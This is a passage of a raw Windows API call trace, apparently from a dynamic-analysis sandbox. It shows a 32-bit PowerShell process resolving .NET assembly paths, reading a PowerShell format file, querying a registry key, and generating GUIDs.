lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0144.896] GetLastError () returned 0x57 [0144.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0144.898] GetLastError () returned 0x57 [0144.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0144.907] GetLastError () returned 0x57 [0144.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0144.931] GetLastError () returned 0x57 [0144.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0144.940] GetLastError () returned 0x57 [0144.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0144.948] GetLastError () returned 0x57 [0144.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0144.992] GetLastError () returned 0x57 [0144.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0144.993] GetLastError () returned 0x57 [0145.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0145.068] GetLastError () returned 0x57 [0145.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0145.071] GetLastError () returned 0x57 [0145.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.071] GetLastError () returned 0x57 [0145.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0145.071] GetLastError () returned 0x57 [0145.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.072] GetLastError () returned 0x57 [0145.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.072] GetLastError () returned 0x57 [0145.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.072] GetLastError () returned 0x57 [0145.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.072] GetLastError () returned 0x57 [0145.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.072] GetLastError () returned 0x57 [0145.124] VirtualQuery (in: lpAddress=0x24cfa0, lpBuffer=0x24dfa0, dwLength=0x1c | out: lpBuffer=0x24dfa0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.128] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x7bfc6d52, Data2=0x7386, Data3=0x4ae9, Data4=([0]=0xac, [1]=0x51, [2]=0x3, [3]=0xec, [4]=0xf7, [5]=0x97, [6]=0x24, [7]=0xbc))) returned 0x0 [0145.129] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa101ab1a, Data2=0x6944, Data3=0x4314, Data4=([0]=0xaa, [1]=0xc7, [2]=0x19, [3]=0xcf, [4]=0xc6, [5]=0x54, [6]=0x50, [7]=0x41))) returned 0x0 [0145.129] VirtualQuery (in: lpAddress=0x24d018, lpBuffer=0x24e018, dwLength=0x1c | out: lpBuffer=0x24e018*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.129] VirtualQuery (in: lpAddress=0x24d018, lpBuffer=0x24e018, dwLength=0x1c | out: lpBuffer=0x24e018*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.130] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x64f85963, Data2=0x93ff, Data3=0x4211, Data4=([0]=0x82, [1]=0x48, [2]=0xfc, [3]=0xcd, [4]=0x99, [5]=0xf9, [6]=0xdc, [7]=0x88))) returned 0x0 [0145.140] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xed522f11, Data2=0xc667, Data3=0x4d4a, Data4=([0]=0xb4, [1]=0x9f, [2]=0x50, [3]=0x5b, [4]=0x7c, [5]=0x7e, [6]=0xeb, [7]=0xef))) returned 0x0 [0145.140] VirtualQuery (in: lpAddress=0x24d144, lpBuffer=0x24e144, dwLength=0x1c | out: lpBuffer=0x24e144*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.140] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.140] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.140] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xfbcf1f24, Data2=0x6f30, Data3=0x40bc, Data4=([0]=0xb3, [1]=0x14, [2]=0xad, [3]=0x7f, [4]=0x24, [5]=0x27, [6]=0xb8, [7]=0x37))) returned 0x0 [0145.140] VirtualQuery (in: lpAddress=0x24d144, lpBuffer=0x24e144, dwLength=0x1c | out: lpBuffer=0x24e144*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.140] VirtualQuery (in: lpAddress=0x24d05c, lpBuffer=0x24e05c, dwLength=0x1c | out: lpBuffer=0x24e05c*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.142] VirtualQuery (in: lpAddress=0x24cd10, lpBuffer=0x24dd10, dwLength=0x1c | out: lpBuffer=0x24dd10*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.142] VirtualQuery (in: lpAddress=0x24cd10, lpBuffer=0x24dd10, dwLength=0x1c | out: lpBuffer=0x24dd10*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.142] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xb79cc3bc, Data2=0x86c7, Data3=0x41ed, Data4=([0]=0x8d, [1]=0xd7, [2]=0x79, [3]=0x25, [4]=0xce, [5]=0x9a, [6]=0xca, [7]=0x54))) returned 0x0 [0145.142] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xf2d23147, Data2=0xb6db, Data3=0x4be4, Data4=([0]=0xbd, [1]=0x45, [2]=0x3f, [3]=0x83, [4]=0xef, [5]=0x7f, [6]=0x74, [7]=0xff))) returned 0x0 [0145.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.142] GetLastError () returned 0x57 [0145.142] SetErrorMode (uMode=0x1) returned 0x1 [0145.143] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1e4 [0145.143] GetLastError () returned 0x0 [0145.143] GetFileType (hFile=0x1e4) returned 0x1 [0145.143] SetErrorMode (uMode=0x1) returned 0x1 [0145.143] GetFileType (hFile=0x1e4) returned 0x1 [0145.143] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.145] GetLastError () returned 0x0 [0145.145] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.155] GetLastError () returned 0x0 [0145.156] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.156] GetLastError () returned 0x0 [0145.156] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.156] GetLastError () returned 0x0 [0145.156] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.156] GetLastError () returned 0x0 [0145.156] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.156] GetLastError () returned 0x0 [0145.156] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.156] GetLastError () returned 0x0 [0145.156] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.156] GetLastError () returned 0x0 [0145.157] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.157] GetLastError () returned 0x0 [0145.157] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.157] GetLastError () returned 0x0 [0145.157] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.157] GetLastError () returned 0x0 [0145.157] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.157] GetLastError () returned 0x0 [0145.157] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.157] GetLastError () returned 0x0 [0145.157] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.158] GetLastError () returned 0x0 [0145.158] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.158] GetLastError () returned 0x0 [0145.158] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.158] GetLastError () returned 0x0 [0145.159] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.159] GetLastError () returned 0x0 [0145.159] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0xbce, lpOverlapped=0x0) returned 1 [0145.159] GetLastError () returned 0x0 [0145.159] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e917b6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e917b6*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.159] GetLastError () returned 0x0 [0145.159] ReadFile (in: hFile=0x1e4, lpBuffer=0x2e92048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2e92048*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.159] GetLastError () returned 0x0 [0145.160] CloseHandle (hObject=0x1e4) returned 1 [0145.160] GetLastError () returned 0x0 [0145.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.160] GetLastError () returned 0x0 [0145.160] SetErrorMode (uMode=0x1) returned 0x1 [0145.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2eb3044 | out: lpFileInformation=0x2eb3044*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0145.160] GetLastError () returned 0x0 [0145.160] SetErrorMode (uMode=0x1) returned 0x1 [0145.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.160] GetLastError () returned 0x0 [0145.160] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e248 | out: phkResult=0x24e248*=0x1e4) returned 0x0 [0145.160] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x0, lpcbData=0x24e28c*=0x0 | out: lpType=0x24e290*=0x1, lpData=0x0, lpcbData=0x24e28c*=0x56) returned 0x0 [0145.160] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x338390, lpcbData=0x24e28c*=0x56 | out: lpType=0x24e290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e28c*=0x56) returned 0x0 [0145.160] RegCloseKey (hKey=0x1e4) returned 0x0 [0145.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.161] GetLastError () returned 0x0 [0145.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.161] GetLastError () returned 0x0 [0145.161] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x8056eb8e, Data2=0x850a, Data3=0x4a77, Data4=([0]=0x83, [1]=0x58, [2]=0xa5, [3]=0x51, [4]=0x71, [5]=0xde, [6]=0x6d, [7]=0x3b))) returned 0x0 [0145.161] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x2a7edf42, Data2=0x20b, Data3=0x4e1a, Data4=([0]=0xa3, [1]=0x54, [2]=0x77, [3]=0x3, [4]=0xff, [5]=0x9f, [6]=0xd3, [7]=0x12))) returned 0x0 [0145.161] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x5085242d, Data2=0xb322, Data3=0x4409, Data4=([0]=0x96, [1]=0x56, [2]=0xe5, [3]=0xb2, [4]=0xfe, [5]=0x1f, [6]=0x69, [7]=0xfb))) returned 0x0 [0145.161] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa7baaea, Data2=0x1e70, Data3=0x4466, Data4=([0]=0x81, [1]=0xeb, [2]=0x77, [3]=0xe1, [4]=0x92, [5]=0x8d, [6]=0xa9, [7]=0x5e))) returned 0x0 [0145.161] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x1d77a659, Data2=0x8fd0, Data3=0x4f35, Data4=([0]=0xa0, [1]=0x7f, [2]=0x47, [3]=0xb3, [4]=0x6a, [5]=0xb9, [6]=0xb8, [7]=0x18))) returned 0x0 [0145.162] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa745470f, Data2=0x72a3, Data3=0x4069, Data4=([0]=0x99, [1]=0x1a, [2]=0x34, [3]=0x69, [4]=0x9c, [5]=0x1a, [6]=0x3e, [7]=0xe7))) returned 0x0 [0145.162] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.162] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x72ffdbfa, Data2=0x7280, Data3=0x442e, Data4=([0]=0xa9, [1]=0x7f, [2]=0x57, [3]=0x35, [4]=0x5c, [5]=0x53, [6]=0x72, [7]=0x86))) returned 0x0 [0145.162] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.162] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.162] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xdde96f96, Data2=0xb2b0, Data3=0x4118, Data4=([0]=0x82, [1]=0x1b, [2]=0x61, [3]=0x39, [4]=0x89, [5]=0x6d, [6]=0xb9, [7]=0x37))) returned 0x0 [0145.162] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x751b4075, Data2=0x13cc, Data3=0x4a58, Data4=([0]=0x93, [1]=0x85, [2]=0x2c, [3]=0x91, [4]=0x5d, [5]=0x2e, [6]=0x74, [7]=0xb5))) returned 0x0 [0145.162] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa1cf6163, Data2=0x9fba, Data3=0x438e, Data4=([0]=0x95, [1]=0xb, [2]=0x31, [3]=0x18, [4]=0xa4, [5]=0xe9, [6]=0x2a, [7]=0xc6))) returned 0x0 [0145.162] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x8519e574, Data2=0xc6f3, Data3=0x4b1d, Data4=([0]=0xb8, [1]=0x20, [2]=0xa, [3]=0xf, [4]=0x93, [5]=0x88, [6]=0xf5, [7]=0x90))) returned 0x0 [0145.162] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.162] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x14f52c95, Data2=0x8a2b, Data3=0x4ae3, Data4=([0]=0x84, [1]=0xc0, [2]=0xdc, [3]=0x18, [4]=0xff, [5]=0x99, [6]=0xc6, [7]=0xb8))) returned 0x0 [0145.162] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: 